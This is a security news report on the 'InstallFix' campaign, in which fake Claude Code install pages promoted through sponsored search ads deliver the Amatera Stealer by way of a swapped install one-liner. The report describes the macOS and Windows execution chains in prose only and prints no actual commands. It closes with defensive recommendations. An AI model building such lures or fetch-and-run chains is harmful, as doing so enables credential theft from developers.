InstallFix Uses Fake Claude Code Pages to Deliver Malware

Push Security published research documenting an attack pattern it calls InstallFix, in which threat actors clone installation or documentation pages for popular developer tools and replace the visible install one-liner with a malicious command, Push Security reported. The campaign has targeted pages mimicking Anthropic's Claude Code install documentation by placing cloned pages via Google-sponsored search results, according to Push Security and reporting in Dark Reading and Help Net Security. When victims copy-and-paste the malicious one-liner, the command fetches and executes code from attacker-controlled infrastructure that results in deployment of an information-stealing payload, researchers observed, with Malwarebytes and SecurityWeek identifying the primary payload as the Amatera Stealer.

Security researchers documented platform-specific execution chains. On macOS, the malicious one-liner often retrieves an obfuscated second-stage script that decodes base64, downloads a binary, sets executable attributes, and launches it, Malwarebytes reported. On Windows, researchers observed commands that spawn cmd.exe and mshta.exe to retrieve and execute remote code, SecurityWeek noted. Push Security also documented abuse of legitimate hosting and distribution channels, including Cloudflare Pages, Squarespace, Tencent EdgeOne, public pages on claude.ai, GitHub repositories, NPM packages, and Homebrew clones, which helps the fake pages blend into normal web traffic.

Editorial analysis: Companies and users that rely on copy-paste one-line installers for developer tools increase their exposure to command injection and malvertising-based social engineering. Industry reporting frames this as an evolution of ClickFix-style tricks into an InstallFix variant that specifically targets developer workflows and the growing popularity of AI coding assistants.

Editorial analysis: The campaign matters because it combines two amplifiers: malvertising to reach many searchers quickly, and developer installation habits that treat a website-provided one-liner as authoritative. For enterprises, stolen browser credentials, session tokens, and saved passwords are high-value for lateral movement and cloud access compromise, a point emphasized across Malwarebytes, SecurityWeek, and Help Net Security coverage.

Editorial analysis: Observers should track three indicators from sources: reported malvertising activity tied to search-engine sponsored links; reuse of hosting platforms like Cloudflare Pages and content-management services for cloned pages; and increased targeting of package registries and public repos for trojanized installers. Push Security's ongoing posts and security vendor telemetry (Malwarebytes, SecurityWeek) are the primary near-term sources for new indicators and IOCs.

Editorial analysis: Defensive teams should view this as a reminder to limit credential reuse, monitor for anomalous OAuth or session use, and increase awareness that web-sourced one-liner installs bypass many traditional email-based protections. Vendor and researcher reporting indicate attackers are leveraging mainstream ad channels and legitimate hosting to evade simple content-blocking approaches, so detection should include URL vetting for sponsored search results and monitoring outbound connections that follow local command execution.